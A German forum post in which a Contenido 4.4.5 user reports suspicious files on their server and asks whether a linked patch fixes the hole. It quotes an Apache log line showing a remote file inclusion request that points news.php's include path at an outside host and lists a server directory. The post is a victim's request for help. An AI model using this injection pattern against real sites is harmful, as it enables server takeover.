ich verwende Contenido 4.4.5.
Sind die Dateien
von COntenido? Denn sonst hatte ein Hacker Zugriff auf den Server.
Die Dateien waren dem User wwwrun zugeordnet, was darauf hinweist, dass die Dateien über eine Sicherheitslücke imPHP-Scriptgekommen sind.
Apache Logfile-Auszug:
..
website.de***ANGREIFER_IP - - [02/Jul/2007:14:30:24 +0200] "POST /contenido/external/frontend/news.php?cfg%5Bpath%5D%5Bincludes%5D=http%3A%2F%2Flott.by%2Fa%3F&act=ls&d=%2Fwww%2Fhtdocs%2Ftkkg%2Fcontenido%2Fcronjobs&sort=0a HTTP/1.1" 200 40870 "http://website.de/contenido/external/fr ... bs&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Gefunden habe ich nun folgendes Thema:
http://www.contenido.org/forum/viewtopi ... 6719#66719
Kann ich damit die Sicherheitslücke schließen und alles ist gut?
Ich hoffe auf eine schnelle Antwort.
Gruß, acquire